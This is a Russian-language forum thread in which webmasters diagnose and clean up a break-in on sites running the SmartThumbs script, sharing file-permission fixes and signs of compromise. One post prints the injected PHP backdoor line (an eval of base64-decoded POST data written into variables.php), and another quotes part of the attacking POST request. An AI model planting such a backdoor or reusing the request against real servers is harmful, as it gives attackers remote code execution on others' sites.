Новая тема   Ответить

 fihorn
WeRock писал:

поскольку у тебя старые версии смарта - то и картинка отличается.

проверь .htpasswd, /admin/variables.php - удали эту строчку
из директории /tmp/ удали
install.php тоже можно удалить, т.к. он просто не нужен


classes/php_class.php - это дырка еще с прошлой версии.
можно обнулить этот файл и так же параметры для него сделать нулевыми, чтобы никто к нему доступа не смог получить и перезаписать не смог и выполнить, рут нужен обычно для этого

 WeRock
Цитата:
т.е. он у меня уже был сломан?!?! Где-то можно про это почитать? Не слышал и в новостях на сайте смарттумбса такого не видел...

Цитата:
спасибо, так и сделал, обнулил и выставил нулевые права.

 BumbleBee
Хреновая новость у меня все сайты на СТ

 zuborg
Нашел дырку


Вопрос, файлик /st/admin/variables.php должен иметь права 777 (или иным образом быть доступным для записи вебсервером, например принадлежать пользователю www) ?

 DG
WeRock писал: http://www.askdamagex.com/f2/attention-all-smart-thumbs-users-16660/

 zuborg
zuborg писал:

Это был вопрос автору
Второй вопрос - в POST запросе
key=Dys%3D&action=niche&niche=1 откуда берется значение key ? Его можно высчитать, зная исходники ST ?

 fihorn
zuborg писал:

ты именно дырку нашел или запечатлел факт взлома?

насчет этого файлика - ну по уму, сам понимаешь, он не должен иметь права 777, но так его выставляет смарттамбс. в этот файл они пишут сеттингсы.

кто-то предложил выставить на него права 444, при этом он не будет писаться вообще, если я понимаю. а если необходимо поменять настройки - то снова менять права на файл. это большой гимор (для меня точно), с другой стороны для безопасности можно временно пойти и на это, пока не сделают фикс.

по поводу пост-запросов и кея - не знаю, тут нужно спрашивать авторов софта. они вроде начали отвечать в том топике на аскдамаге

 Polunochnik
Цитата:

 zuborg
fihorn писал:

нашел запрос которым в файлике variables.php прописывается строчка
$niche='1';@eval(base64_decode($_POST[qxp]));//';

 Ziegfrid
zuborg: это давно уже нашли.

 WorldTraffic
fihorn писал:
можешь обьяснить почему его нужно удалить и почему его не должно быть? а то я проверил он есть у всех копиях СТ дата создания совподает с таким файлом calendar.js или в этой папке вообще не должно быть .js файлов?

 fihorn
world-gay-sex писал:

там должен быть
sniffer.js
но не должно быть
sniffer_class.php


а по поводу запроса, которым прописывается строчка - хотел сначала попросить сюда выложить, потом подумал, что не стоит.
как-то заблокировать его можно?

 zuborg
fihorn писал:
Просто интересно, как взломщик подбирает key
достаточно ли тут имени домена или надо другая секретная информация

Я не знаток ST, непонятно зачем вообще открывать скрипт который меняет глобальные настройки в общий доступ, даже если он "защищен" этим параметром key.
Может запретить на /st/flush.php POST вообще, кроме некоторых ипов ?

 Soft-Com
нужен не только key, но и token для сверки операции с базой

 zuborg
запрос работает без token вполне успешно, но key для разных доменов разные


вариантов пока вижу два, первы - убрать права разрешающие запись всем на файлик /st/admin/variables.php, обычно стоят права 777 и владелец www впридачу, надо поставить 444

второй - запретить POST-ы на /st/flush.php

я не спец по ST и не знаю чем чреваты оба варианта

 zuborg
признаки взлома:
а) не должно быть левых юзеров в st/admin/.htpasswd
б) не должно быть include и eval в st/admin/variables.php
в) не должно быть php файлов в st/thumbs

кто-то знает ещё четкие признаки ?

 wMaster
zuborg писал:
У меня в variables.php было так
Код:
а вот на смарте, который имел пустого юзера и php файл в st/thumbs, появился какой-то добавочный параметр в конце <?$qall=1;?>

 WeRock
г) в директоии /tmp/ сервера не должно быть файла ases.tmp

 Soft-Com
WeRock писал:

*ses.tmp

 zuborg
знатоки ST, что может поломать такой st/.htaccess ?

Код:

 zuborg
Soft-Com писал:
эти файлы заливаются через дырку когда в variables.php строчку
Код:
меняют на
Код:

 wMaster
Проверьте плиз у вас встречается в вариаблес параметр <?$qall=1;?> ? Это смартовский параметр или все-таки левый.

 WeRock
Цитата:

у меня нет такого. Похоже на левак.

 densa
Нашел у себя эту хрень
еще все клики по тумбам открывают корень домена, админка смарта не показывает что по тумбам кликают, при это логов ошибок крона нет.
Это что за фигня? Вроде все подчистил

 densa
Кстати версия смарта была предпоследней, а не последней